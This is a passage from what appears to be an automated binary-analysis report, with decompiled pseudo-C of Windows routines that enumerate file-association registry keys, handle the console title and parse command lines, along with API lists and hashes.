				signed int _t56;
				long _t64;
				intOrPtr _t67;
				short* _t69;
				signed int _t72;
				void* _t76;
				short* _t80;
				void* _t81;
				void* _t83;
				signed int _t90;
				signed int _t92;
				void* _t98;
				signed int _t99;
				void* _t102;
				signed int _t105;
				signed int _t108;
				void* _t112;
				signed int _t116;
				signed int _t118;
				signed int _t119;
				int _t120;
				intOrPtr* _t123;
				signed int _t125;
				signed int _t126;
				void* _t127;

				_t113 = __edx;
				_t38 =  *0x2cd0b4; // 0x40f69e4c
				_v8 = _t38 ^ _t126;
				_t81 = __ecx;
				_v532 = __ecx;
				if(__edx != 0) {
					__eflags =  *__edx - 0x2e;
					if( *__edx != 0x2e) {
						_t119 = E002ADF40(E002ADEF9(__edx));
						__eflags = _t119;
						if(_t119 == 0) {
							L34:
							_t42 = 1;
							L55:
							return E002B6FD0(_t42, _t81, _v8 ^ _t126, _t113, _t119, _t120);
						}
						_t44 = E002B2349(_t119, 0x20);
						__eflags = _t44;
						if(_t44 != 0) {
							__eflags = 0;
							 *_t44 = 0;
						}
						_t90 = _t119;
						_t29 = _t90 + 2; // 0x2
						_t113 = _t29;
						do {
							_t45 =  *_t90;
							_t90 = _t90 + 2;
							__eflags = _t45;
						} while (_t45 != 0);
						_t92 = _t90 - _t113 >> 1;
						_push(_t119);
						_t30 = _t92 + 0x14; // 0x12
						__eflags = _t30 - 0x104;
						if(_t30 <= 0x104) {
							E002B1040( &_v528, 0x104);
							_t113 = 0x104;
							E002B18C0( &_v528, 0x104, L"\\Shell\\Open\\Command");
							_t120 = RegOpenKeyExW(_t81,  &_v528, 0, 0x2000000,  &_v548);
							__eflags = _t120;
							if(__eflags == 0) {
								_t113 =  &_v528;
								_t95 = _t81;
								_t81 = E002C5662(_t81, _t81,  &_v528, _t119, _t120, __eflags);
								__eflags = _t81;
								if(_t81 == 0) {
									L51:
									E002AC5A2(_t95, 0x400023a5, 1, _t119);
									L52:
									E002B0040(_t81);
									L53:
									E002B0040(_t119);
									L54:
									_t42 = _t120;
									goto L55;
								}
								_t98 = _t81;
								_t36 = _t98 + 2; // 0x2
								_t113 = _t36;
								do {
									_t56 =  *_t98;
									_t98 = _t98 + 2;
									__eflags = _t56;
								} while (_t56 != 0);
								_t99 = _t98 - _t113;
								__eflags = _t99;
								_t95 = _t99 >> 1;
								if(_t99 == 0) {
									goto L51;
								}
								_push(_t81);
								_push(_t119);
								E002B25D9(L"%s=%s\r\n");
								goto L52;
							}
							E002AC5A2( &_v528, 0x400023a5, 1, _t119);
							goto L53;
						}
						_push(1);
						_push(0x400023db);
						E002AC5A2(_t92);
						E002B0040(_t119);
						_t42 = 0x7b;
						goto L55;
					}
					E002AC5A2(__ecx, 0x400023a5, 1, __edx);
					_t42 = 0x7b;
					goto L55;
				}
				_t120 = 0;
				_v540 = 0x104;
				_v536 = 0;
				_t64 = RegEnumKeyExW(__ecx, 0,  &_v528,  &_v540, 0, 0, 0, 0);
				if(_t64 != 0) {
					L32:
					_t28 = _t64 - 0x103; // -259
					asm("sbb esi, esi");
					_t120 =  ~_t28 & _t64;
					goto L54;
				}
				do {
					if(_v528 == 0x2e) {
						L30:
						if( *0x2cd544 != 0) {
							goto L34;
						}
						goto L31;
					}
					_t123 =  &_v528;
					_t9 = _t123 + 2; // 0x30
					_t102 = _t9;
					do {
						_t67 =  *_t123;
						_t123 = _t123 + 2;
					} while (_t67 != 0);
					_t125 = _t123 - _t102 >> 1;
					_t10 = _t125 + 0x14; // 0x40
					if(_t10 > 0x104) {
						L29:
						_t120 = _v536;
						goto L30;
					}
					_t116 = 0x104;
					_t69 =  &_v528;
					while( *_t69 != 0) {
						_t69 = _t69 + 2;
						_t116 = _t116 - 1;
						if(_t116 != 0) {
							continue;
						}
						break;
					}
					asm("sbb ecx, ecx");
					_t105 =  ~_t116 & 0x00000104 - _t116;
					if(_t116 == 0) {
						L22:
						_t113 =  &_v528;
						_t106 = _t81;
						_t72 = E002C5662(_t81, _t81,  &_v528, _t119, _t125, 0);
						_t120 = _t125 + _t125;
						_t119 = _t72;
						if(_t120 >= 0x208) {
							E002B711D(_t72, _t81, _t106,  &_v528, _t119, _t120);
							goto L34;
						}
						 *((short*)(_t126 + _t120 - 0x20c)) = 0;
						if(_t119 == 0) {
							L28:
							E002B0040(_t119);
							goto L29;
						}
						_t108 = _t119;
						_t21 = _t108 + 2; // 0x2
						_t113 = _t21;
						do {
							_t76 =  *_t108;
							_t108 = _t108 + 2;
						} while (_t76 != 0);
						if(_t108 != _t113) {
							_push(_t119);
							_push( &_v528);
							E002B25D9(L"%s=%s\r\n");
							_t127 = _t127 + 0xc;
						}
						goto L28;
					}
					_t80 =  &(( &_v528)[_t105]);
					_t118 = 0x104 - _t105;
					if(0x104 == 0) {
						L19:
						_t80 = _t80 - 2;
						L21:
						 *_t80 = 0;
						goto L22;
					}
					_t112 = 0x7ffffffe;
					_t83 = L"\\Shell\\Open\\Command" - _t80;
					while(_t112 != 0) {
						_t119 =  *(_t83 + _t80) & 0x0000ffff;
						if(_t119 == 0) {
							break;
						}
						 *_t80 = _t119;
						_t112 = _t112 - 1;
						_t80 =  &(_t80[1]);
						_t118 = _t118 - 1;
						if(_t118 != 0) {
							continue;
						}
						L18:
						_t81 = _v532;
						goto L19;
					}
					__eflags = _t118;
					if(__eflags != 0) {
						_t81 = _v532;
						goto L21;
					}
					goto L18;
					L31:
					_v540 = 0x104;
					_t120 = _t120 + 1;
					_v536 = _t120;
					_t64 = RegEnumKeyExW(_t81, _t120,  &_v528,  &_v540, 0, 0, 0, 0);
				} while (_t64 == 0);
				goto L32;
			}










































                                              0x002c4cf0
                                              0x002c4cfb
                                              0x002c4d02
                                              0x002c4d06
                                              0x002c4d08
                                              0x002c4d12
                                              0x002c4ec8
                                              0x002c4ecc
                                              0x002c4ef6
                                              0x002c4ef8
                                              0x002c4efa
                                              0x002c4ebe
                                              0x002c4ebe
                                              0x002c5000
                                              0x002c5010
                                              0x002c5010
                                              0x002c4f03
                                              0x002c4f08
                                              0x002c4f0a
                                              0x002c4f0c
                                              0x002c4f0e
                                              0x002c4f0e
                                              0x002c4f11
                                              0x002c4f13
                                              0x002c4f13
                                              0x002c4f16
                                              0x002c4f16
                                              0x002c4f19
                                              0x002c4f1c
                                              0x002c4f1c
                                              0x002c4f23
                                              0x002c4f25
                                              0x002c4f26
                                              0x002c4f29
                                              0x002c4f2e
                                              0x002c4f5b
                                              0x002c4f65
                                              0x002c4f70
                                              0x002c4f91
                                              0x002c4f93
                                              0x002c4f95
                                              0x002c4fa9
                                              0x002c4faf
                                              0x002c4fb6
                                              0x002c4fb8
                                              0x002c4fba
                                              0x002c4fe0
                                              0x002c4fe8
                                              0x002c4fed
                                              0x002c4ff2
                                              0x002c4ff7
                                              0x002c4ff9
                                              0x002c4ffe
                                              0x002c4ffe
                                              0x00000000
                                              0x002c4ffe
                                              0x002c4fbc
                                              0x002c4fbe
                                              0x002c4fbe
                                              0x002c4fc1
                                              0x002c4fc1
                                              0x002c4fc4
                                              0x002c4fc7
                                              0x002c4fc7
                                              0x002c4fcc
                                              0x002c4fcc
                                              0x002c4fce
                                              0x002c4fd0
                                              0x00000000
                                              0x00000000
                                              0x002c4fd2
                                              0x002c4fd3
                                              0x002c4fd9
                                              0x00000000
                                              0x002c4fd9
                                              0x002c4f9f
                                              0x00000000
                                              0x002c4fa4
                                              0x002c4f30
                                              0x002c4f32
                                              0x002c4f37
                                              0x002c4f41
                                              0x002c4f46
                                              0x00000000
                                              0x002c4f46
                                              0x002c4ed6
                                              0x002c4ede
                                              0x00000000
                                              0x002c4ede
                                              0x002c4d18
                                              0x002c4d1a
                                              0x002c4d2e
                                              0x002c4d3e
                                              0x002c4d46
                                              0x002c4ea8
                                              0x002c4ea8
                                              0x002c4eb0
                                              0x002c4eb2
                                              0x00000000
                                              0x002c4eb2
                                              0x002c4d50
                                              0x002c4d58
                                              0x002c4e68
                                              0x002c4e6f
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002c4e6f
                                              0x002c4d5e
                                              0x002c4d64
                                              0x002c4d64
                                              0x002c4d67
                                              0x002c4d67
                                              0x002c4d6a
                                              0x002c4d6d
                                              0x002c4d74
                                              0x002c4d76
                                              0x002c4d7e
                                              0x002c4e62
                                              0x002c4e62
                                              0x00000000
                                              0x002c4e62
                                              0x002c4d84
                                              0x002c4d89
                                              0x002c4d90
                                              0x002c4d96
                                              0x002c4d99
                                              0x002c4d9c
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002c4d9c
                                              0x002c4da9
                                              0x002c4dab
                                              0x002c4daf
                                              0x002c4e05
                                              0x002c4e05
                                              0x002c4e0b
                                              0x002c4e0d
                                              0x002c4e12
                                              0x002c4e14
                                              0x002c4e1c
                                              0x002c4eb9
                                              0x00000000
                                              0x002c4eb9
                                              0x002c4e24
                                              0x002c4e2e
                                              0x002c4e5b
                                              0x002c4e5d
                                              0x00000000
                                              0x002c4e5d
                                              0x002c4e30
                                              0x002c4e32
                                              0x002c4e32
                                              0x002c4e35
                                              0x002c4e35
                                              0x002c4e38
                                              0x002c4e3b
                                              0x002c4e44
                                              0x002c4e46
                                              0x002c4e4d
                                              0x002c4e53
                                              0x002c4e58
                                              0x002c4e58
                                              0x00000000
                                              0x002c4e44
                                              0x002c4dbc
                                              0x002c4dbf
                                              0x002c4dc1
                                              0x002c4df5
                                              0x002c4df5
                                              0x002c4e00
                                              0x002c4e02
                                              0x00000000
                                              0x002c4e02
                                              0x002c4dc8
                                              0x002c4dcd
                                              0x002c4dd0
                                              0x002c4dd4
                                              0x002c4ddb
                                              0x00000000
                                              0x00000000
                                              0x002c4ddd
                                              0x002c4de0
                                              0x002c4de1
                                              0x002c4de4
                                              0x002c4de7
                                              0x00000000
                                              0x00000000
                                              0x002c4def
                                              0x002c4def
                                              0x00000000
                                              0x002c4def
                                              0x002c4deb
                                              0x002c4ded
                                              0x002c4dfa
                                              0x00000000
                                              0x002c4dfa
                                              0x00000000
                                              0x002c4e71
                                              0x002c4e7f
                                              0x002c4e90
                                              0x002c4e94
                                              0x002c4e9a
                                              0x002c4ea0
                                              0x00000000

                                              APIs
                                              • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 002C4D3E
                                              • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000001,0000002E,00000104,00000000,00000000,00000000,00000000,?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 002C4E9A
                                              • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?,\Shell\Open\Command,00000000), ref: 002C4F8B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: Enum$Open
                                              • String ID: %s=%s$.$\Shell\Open\Command
                                              • API String ID: 2886760741-1459555574
                                              • Opcode ID: 271988f78d828278ce83807fbdcdfca46530934ab3516e0014746537b6e035bb
                                              • Instruction ID: 6379ecd145d32ff095f7370601ce4139d2b314dceb0afad88f2d0c1b9239a2cc
                                              • Opcode Fuzzy Hash: 271988f78d828278ce83807fbdcdfca46530934ab3516e0014746537b6e035bb
                                              • Instruction Fuzzy Hash: CF813975A2021557DB34BF24DCA9FFB3379EB84300F1543ACE80A97281DA759EA48B90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002AB2B0, Relevance: 10.7, APIs: 7, Instructions: 172COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 77%
                                              			E002AB2B0(WCHAR* __ecx, signed int _a4) {
				signed int _v12;
				long _v536;
				wchar_t* _v540;
				wchar_t* _v544;
				wchar_t* _v548;
				signed int _v552;
				WCHAR* _v556;
				intOrPtr _v560;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				long _t35;
				void* _t38;
				short _t47;
				wchar_t* _t48;
				intOrPtr _t49;
				intOrPtr* _t50;
				intOrPtr _t51;
				signed int _t54;
				WCHAR* _t55;
				signed int _t62;
				intOrPtr* _t63;
				WCHAR* _t70;
				intOrPtr _t77;
				wchar_t* _t79;
				WCHAR* _t80;
				wchar_t* _t81;
				signed int _t82;

				_t65 = __ecx;
				_t32 =  *0x2cd0b4; // 0x40f69e4c
				_v12 = _t32 ^ _t82;
				_t62 = _a4;
				_t76 =  &_v544;
				_v552 = _t62;
				_v548 = 0;
				_v540 = 0;
				_t35 = E002AB42E( &_v544);
				if(_t35 < 0) {
					SetLastError(RtlNtStatusToDosError(_t35));
					L23:
					if(_t62 == 0) {
						_t62 = 0;
						_t80 = 0;
						L12:
						if(_t80 != 0) {
							SetConsoleTitleW(_t80);
							 *0x2cd59c = _t62;
						}
						L14:
						_t77 = 0;
						if(_v548 == 0) {
							L17:
							_t38 = _v540;
							if(_t38 != 0) {
								LocalFree(_t38);
							}
							if(_t77 != 0) {
								L29:
								_push(0);
								_push(8);
								E002AC5A2(_t65);
								goto L20;
							} else {
								L20:
								return E002B6FD0(_t77, _t62, _v12 ^ _t82, _t76, _t77, _t80);
							}
						}
						L15:
						if(_t80 != 0) {
							_t65 = _t80;
							E002B0040(_t80);
						}
						goto L17;
					}
					_t65 =  *(_t62 + 0x3c);
					_t80 = E002ADEF9( *(_t62 + 0x3c));
					if(_t80 == 0) {
						goto L14;
					}
					_t70 = _t80;
					_t62 = 0;
					_t21 =  &(_t70[1]); // 0x2
					_t76 = _t21;
					do {
						_t47 =  *_t70;
						_t70 =  &(_t70[1]);
					} while (_t47 != 0);
					_t65 = _t70 - _t76 >> 1;
					if(_t70 - _t76 >> 1 < 0x104) {
						goto L12;
					}
					_t77 = 1;
					goto L29;
				}
				_t48 = _v544;
				if(_t48 >= 3) {
					_t48 = _t48 + 0xfffffff0;
				}
				if(_t48 != 0) {
					goto L23;
				} else {
					_t49 = _t48 + 1;
					_t77 = _t49;
					_v548 = _t49;
					_v560 = _t77;
					_t50 = E002AB3FC(_t65);
					_v540 = _t50;
					_t65 = 0x40002748;
					if(_t50 == 0) {
						goto L29;
					} else {
						_t63 = _t50;
						_t76 = 0;
						_t11 = _t63 + 2; // 0x2
						_t65 = _t11;
						do {
							_t51 =  *_t63;
							_t63 = _t63 + 2;
						} while (_t51 != 0);
						_t62 = _t63 - _t65 >> 1;
						if(_t62 >= 0x104) {
							goto L17;
						}
						_t65 = 0x208;
						_t80 = E002B00B0(0x208);
						_v556 = _t80;
						if(_t80 == 0) {
							goto L17;
						}
						_t76 = 0x104;
						_t65 = _t80;
						E002B1040(_t80, 0x104, _v540);
						_t54 = _v552;
						if(_t54 == 0) {
							_t55 =  &_v536;
							_v544 = _t55;
							if(GetConsoleTitleW(_t55, 0x104) == 0) {
								goto L15;
							}
							if(wcsstr( &_v536, _v540) == 0) {
								L36:
								_t76 = 0x104;
								_t65 = _t80;
								if(E002B18C0(_t80, 0x104, _v544) != 0) {
									goto L15;
								}
								L11:
								_t62 = 0;
								goto L12;
							}
							_t79 = _v540;
							_t81 =  &_v536;
							_t62 = _t62 + _t62;
							do {
								_t81 = _t81 + _t62;
							} while (wcsstr(_t81, _t79) != 0);
							_t77 = _v560;
							_v544 = _t81;
							_t80 = _v556;
							goto L36;
						}
						if( *((intOrPtr*)(_t54 + 0x3c)) == 0) {
							_t65 = 0;
							_t77 = 0;
							goto L15;
						}
						_t76 = 0x104;
						_t65 = _t80;
						if(E002B18C0(_t80, 0x104,  *((intOrPtr*)(_t54 + 0x3c))) != 0) {
							goto L15;
						}
						goto L11;
					}
				}
			}
































                                              0x002ab2b0
                                              0x002ab2bb
                                              0x002ab2c2
                                              0x002ab2c6
                                              0x002ab2c9
                                              0x002ab2d2
                                              0x002ab2d9
                                              0x002ab2df
                                              0x002ab2e5
                                              0x002ab2ec
                                              0x002c1346
                                              0x002c134c
                                              0x002c134e
                                              0x002c142c
                                              0x002c142e
                                              0x002ab3a0
                                              0x002ab3a2
                                              0x002ab3a5
                                              0x002ab3ab
                                              0x002ab3ab
                                              0x002ab3b1
                                              0x002ab3b3
                                              0x002ab3bb
                                              0x002ab3c8
                                              0x002ab3c8
                                              0x002ab3d0
                                              0x002ab3d3
                                              0x002ab3d3
                                              0x002ab3db
                                              0x002c138b
                                              0x002c138d
                                              0x002c138e
                                              0x002c1390
                                              0x00000000
                                              0x002ab3e1
                                              0x002ab3e1
                                              0x002ab3f3
                                              0x002ab3f3
                                              0x002ab3db
                                              0x002ab3bd
                                              0x002ab3bf
                                              0x002ab3c1
                                              0x002ab3c3
                                              0x002ab3c3
                                              0x00000000
                                              0x002ab3bf
                                              0x002c1354
                                              0x002c135c
                                              0x002c1360
                                              0x00000000
                                              0x00000000
                                              0x002c1366
                                              0x002c1368
                                              0x002c136a
                                              0x002c136a
                                              0x002c136d
                                              0x002c136d
                                              0x002c1370
                                              0x002c1373
                                              0x002c137a
                                              0x002c1382
                                              0x00000000
                                              0x00000000
                                              0x002c138a
                                              0x00000000
                                              0x002c138a
                                              0x002ab2f2
                                              0x002ab2fb
                                              0x002c139c
                                              0x002c139c
                                              0x002ab303
                                              0x00000000
                                              0x002ab309
                                              0x002ab309
                                              0x002ab30a
                                              0x002ab30c
                                              0x002ab317
                                              0x002ab31d
                                              0x002ab322
                                              0x002ab328
                                              0x002ab32b
                                              0x00000000
                                              0x002ab331
                                              0x002ab331
                                              0x002ab333
                                              0x002ab335
                                              0x002ab335
                                              0x002ab338
                                              0x002ab338
                                              0x002ab33b
                                              0x002ab33e
                                              0x002ab345
                                              0x002ab34d
                                              0x00000000
                                              0x00000000
                                              0x002ab34f
                                              0x002ab359
                                              0x002ab35b
                                              0x002ab363
                                              0x00000000
                                              0x00000000
                                              0x002ab36b
                                              0x002ab370
                                              0x002ab372
                                              0x002ab377
                                              0x002ab37f
                                              0x002c13a4
                                              0x002c13b0
                                              0x002c13be
                                              0x00000000
                                              0x00000000
                                              0x002c13db
                                              0x002c140d
                                              0x002c1413
                                              0x002c1418
                                              0x002c1421
                                              0x00000000
                                              0x00000000
                                              0x002ab39e
                                              0x002ab39e
                                              0x00000000
                                              0x002ab39e
                                              0x002c13dd
                                              0x002c13e3
                                              0x002c13e9
                                              0x002c13eb
                                              0x002c13eb
                                              0x002c13f7
                                              0x002c13fb
                                              0x002c1401
                                              0x002c1407
                                              0x00000000
                                              0x002c1407
                                              0x002ab389
                                              0x002ab3f6
                                              0x002ab3f8
                                              0x00000000
                                              0x002ab3f8
                                              0x002ab38e
                                              0x002ab393
                                              0x002ab39c
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002ab39c
                                              0x002ab32b

                                              APIs
                                                • Part of subcall function 002AB42E: NtOpenThreadToken.NTDLL(000000FE,00000008,00000000,00000000), ref: 002AB448
                                                • Part of subcall function 002AB42E: NtOpenProcessToken.NTDLL ref: 002AB460
                                                • Part of subcall function 002AB42E: NtClose.NTDLL(00000000), ref: 002AB4B1
                                              • SetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000), ref: 002AB3A5
                                              • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 002AB3D3
                                              • RtlNtStatusToDosError.NTDLL ref: 002C133F
                                              • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 002C1346
                                              • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(?,00000104,?), ref: 002C13B6
                                              • wcsstr.MSVCRT ref: 002C13D1
                                              • wcsstr.MSVCRT ref: 002C13EF
                                                • Part of subcall function 002AB3FC: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001900,00000000,?,00000000,?,00000000,?,?,?,?,002C95EF,002B9564,00000001,?), ref: 002AB421
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
                                              • String ID:
                                              • API String ID: 1313749407-0
                                              • Opcode ID: 8545b95b5708629650466108b21e4c6ea48122ddc183ac706c06bb5fc7b3927a
                                              • Instruction ID: 5ff122a9d166dcb63ec7ac32104351e0177bc809d0093014ad8735c922c11785
                                              • Opcode Fuzzy Hash: 8545b95b5708629650466108b21e4c6ea48122ddc183ac706c06bb5fc7b3927a
                                              • Instruction Fuzzy Hash: E051E431A2021A8BDF219F759CC9BAE77A4EF56310F1401EAD905DB242EF709DA1CF90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002AE9A0, Relevance: 10.6, APIs: 7, Instructions: 141COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 71%
                                              			E002AE9A0(long __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t62;
				signed int _t63;
				long _t64;
				wchar_t* _t66;
				signed char _t67;
				signed int _t68;
				int _t70;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				long _t75;
				void* _t78;
				long _t83;
				void* _t86;
				void* _t92;
				signed int* _t95;
				int _t97;
				long _t99;
				wchar_t* _t101;
				wchar_t* _t104;
				wchar_t* _t106;
				wchar_t* _t109;
				long _t111;
				wchar_t* _t114;
				signed int _t117;
				void* _t118;
				signed short* _t123;
				long _t124;
				long _t125;
				signed int _t138;
				void* _t139;
				long _t142;
				signed int _t146;
				void* _t149;
				signed int _t152;
				long _t153;
				void* _t157;
				signed int _t159;
				signed int* _t160;
				signed int _t163;
				void* _t164;
				void* _t168;
				void* _t171;
				signed short* _t173;
				long _t174;
				signed int _t177;
				void* _t179;
				void* _t180;
				void* _t183;
				signed int _t184;
				void* _t188;

				_t173 = __ecx;
				_t121 = 0x50;
				_push(_t160);
				_t114 = E002B00B0(0x50);
				if(_t114 == 0) {
					E002C9287(0x50);
					__imp__longjmp(0x2db8b8, 1);
					goto L91;
				} else {
					 *_t114 = __ecx;
					_t114[0x10] = 0;
					_t121 =  *0x2dfa8c +  *0x2dfa8c;
					_t111 = E002B00B0( *0x2dfa8c +  *0x2dfa8c);
					if(_t111 == 0) {
						L91:
						E002C9287(_t121);
						__imp__longjmp(0x2db8b8, 1);
						asm("int3");
						E002C9287(_t121);
						__imp__longjmp(0x2db8b8, 1);
						E002C9287(_t121);
						__imp__longjmp(0x2db8b8, 1);
						L94:
						while(1) {
							if(E002AD7D4(_t114,  *_t173) != 0) {
								L17:
								 *(_t184 - 0xdc) = 0;
								if(_t114 == 0) {
									L19:
									 *_t160 =  *_t173;
									_t160 =  &(_t160[0]);
									if( *_t173 == 0x22) {
										while(1) {
											_t62 = _t173[1];
											_t123 = _t173;
											_t173 =  &(_t173[1]);
											 *_t160 = _t62;
											_t160 =  &(_t160[0]);
											_t63 =  *_t173 & 0x0000ffff;
											if(_t63 == 0) {
												break;
											}
											if(_t63 == 0x22) {
												goto L20;
											} else {
												if(_t173[1] != 0) {
													continue;
												} else {
													goto L20;
												}
											}
											goto L22;
										}
										_t173 = _t123;
									}
									L20:
									 *(_t184 - 0xd8) = 0;
								} else {
									_t66 = wcschr(_t114,  *_t173 & 0x0000ffff);
									_t188 = _t188 + 8;
									if(_t66 != 0) {
										_t67 =  *(_t184 + 8);
										if((_t67 & 0x00000002) != 0) {
											_t68 =  *_t173 & 0x0000ffff;
											if( *(_t184 - 0xd8) == 0) {
												_t160 =  &(_t160[0]);
											}
											 *_t160 = _t68;
											 *(_t184 - 0xd8) = 1;
											_t160 =  &(_t160[1]);
										} else {
											if((_t67 & 0x00000004) != 0) {
												 *_t160 =  *_t173;
											}
											 *(_t184 - 0xd8) = 0;
											_t160 =  &(_t160[0]);
										}
									} else {
										goto L19;
									}
								}
								_t64 = _t173[1] & 0x0000ffff;
								_t173 =  &(_t173[1]);
								_t124 = _t64;
								if(_t64 != 0) {
									goto L14;
								}
							} else {
								L29:
								_t75 =  *_t173 & 0x0000ffff;
								if(_t75 != 0) {
									_t142 = _t75;
									while(_t142 != 0x22) {
										_t97 = iswspace(_t142);
										_t188 = _t188 + 4;
										if(_t97 != 0) {
											L39:
											if( *(_t184 - 0xe0) == 0 || _t114 == 0) {
												L42:
												if( *(_t184 - 0xe4) != 0) {
													if(E002AD7D4(_t114,  *_t173) != 0) {
														break;
													} else {
														goto L43;
													}
												} else {
													L43:
													_t99 = _t173[1] & 0x0000ffff;
													_t173 =  &(_t173[1]);
													_t142 = _t99;
													if(_t99 != 0) {
														continue;
													} else {
													}
												}
											} else {
												_t101 = wcschr(_t114,  *_t173 & 0x0000ffff);
												_t188 = _t188 + 8;
												if(_t101 != 0) {
													break;
												} else {
													goto L42;
												}
											}
										} else {
											_t104 = wcschr(_t184 - 0xd4,  *_t173 & 0x0000ffff);
											_t188 = _t188 + 8;
											if(_t104 != 0) {
												goto L39;
											} else {
												break;
											}
										}
										goto L22;
									}
									if( *_t173 != 0) {
										if( *(_t184 - 0xdc) == 0 &&  *(_t184 - 0xd8) == 0) {
											_t160 =  &(_t160[0]);
										}
										 *(_t184 - 0xd8) = 1;
										goto L17;
										do {
											do {
												do {
													do {
														goto L17;
														L14:
													} while (_t124 == 0x22);
													_t70 = iswspace(_t124);
													_t188 = _t188 + 4;
													if(_t70 != 0) {
														break;
													} else {
														goto L16;
													}
													goto L22;
													L16:
													_t109 = wcschr(_t184 - 0xd4,  *_t173 & 0x0000ffff);
													_t188 = _t188 + 8;
												} while (_t109 == 0);
												_t71 =  *(_t184 + 8);
												if((_t71 & 0x00000001) != 0) {
													goto L54;
												} else {
													L25:
													_t72 = _t71 & 0x00000002;
													 *(_t184 - 0xe0) = _t72;
													if(_t72 == 0 || _t114 == 0) {
														goto L28;
													} else {
														goto L27;
													}
												}
												goto L22;
												L54:
											} while ( *(_t184 - 0xdc) == 0);
											goto L25;
											L27:
											_t106 = wcschr(_t114,  *_t173 & 0x0000ffff);
											_t188 = _t188 + 8;
										} while (_t106 != 0);
										L28:
										_t74 =  *(_t184 + 8) & 0x00000004;
										 *(_t184 - 0xe4) = _t74;
										if(_t74 != 0) {
											continue;
										} else {
											goto L29;
										}
									}
								}
							}
							L22:
							_t125 =  *(_t184 - 0xe8);
							_t163 = _t160 - _t125 >> 1;
							_t148 = 4 + _t163 * 2;
							if(E002B0100(_t125, 4 + _t163 * 2) == 0) {
								E002C9287(_t125);
								__imp__longjmp(0x2db8b8, 1);
								asm("int3");
								while(1) {
									L100:
									_t149 = _t125 + 2;
									do {
										_t78 =  *_t125;
										_t125 = _t125 + 2;
									} while (_t78 != 0);
									_t164 = _t163 + (_t125 - _t149 >> 1);
									while(1) {
										L64:
										_t128 = _t164 + _t164;
										_t174 = E002B00B0(_t164 + _t164);
										 *(_t184 - 4) = _t174;
										if(_t174 == 0) {
											break;
										}
										_t130 = _t114[0xf];
										if(_t114[0xf] != 0) {
											E002B1040(_t174, _t164, _t130);
										}
										_t86 = 0;
										if(_t164 == 0 || _t164 > 0x7fffffff) {
											_t86 = 0x80070057;
										}
										if(_t86 < 0) {
											L107:
											_t152 = 0;
										} else {
											_t86 = 0;
											_t139 = _t164;
											_t153 = _t174;
											if(_t164 == 0) {
												L106:
												_t86 = 0x80070057;
												goto L107;
											} else {
												while( *_t153 != _t86) {
													_t153 = _t153 + 2;
													_t139 = _t139 - 1;
													if(_t139 != 0) {
														continue;
													} else {
														goto L106;
													}
													goto L73;
												}
												if(_t139 == 0) {
													goto L106;
												} else {
													_t152 = _t164 - _t139;
												}
											}
										}
										L73:
										if(_t86 >= 0) {
											_t95 =  *(_t184 - 4) + _t152 * 2;
											_t179 = _t164 - _t152;
											if(_t179 == 0) {
												L79:
												_t95 = _t95 - 2;
											} else {
												_t157 = _t152 + 0x7ffffffe + _t179 - _t164;
												_t164 = 0x2dfaa0 - _t95;
												while(_t157 != 0) {
													_t138 =  *(_t164 + _t95) & 0x0000ffff;
													if(_t138 == 0) {
														break;
													} else {
														 *_t95 = _t138;
														_t157 = _t157 - 1;
														_t95 =  &(_t95[0]);
														_t179 = _t179 - 1;
														if(_t179 != 0) {
															continue;
														} else {
															goto L79;
														}
													}
													goto L81;
												}
												if(_t179 == 0) {
													goto L79;
												}
											}
											L81:
											_t174 =  *(_t184 - 4);
											 *_t95 = 0;
										}
										_t114[0xf] = _t174;
										while(E002AEEC8() != 0) {
											if(E002AF030(1) == 0x4000) {
												_t125 = _t114[0xf];
												_t163 =  *0x2dfa8c;
												if(_t125 != 0) {
													goto L100;
												}
												goto L64;
											} else {
												_t177 =  *(_t184 - 8);
												if(E002B02B0(_t114, _t177, _t164, _t177) != 0) {
													_t92 =  *_t177;
													do {
														_t51 = _t92 + 0x14; // 0x14
														_t117 = _t51;
														_t92 =  *_t117;
														 *(_t184 - 8) = _t117;
													} while (_t92 != 0);
													_t114 =  *(_t184 - 0x10);
													continue;
												} else {
													E002AF300(_t91, 0, 0, _t91);
													break;
												}
											}
											goto L112;
										}
										_t114[0xd] =  *(_t184 - 0xc);
										return _t114;
										goto L112;
									}
									E002C9287(_t128);
									__imp__longjmp(0x2db8b8, 1);
									asm("int3");
									if( *0x2dfa90 != 0) {
										E002C82EB(_t128);
									}
									 *0x2cd5c8 = 0;
									if( *0x2dfa88 != 0) {
										E002C8121(_t174, 0);
									}
									_t83 = _t174;
									return _t83;
									goto L112;
								}
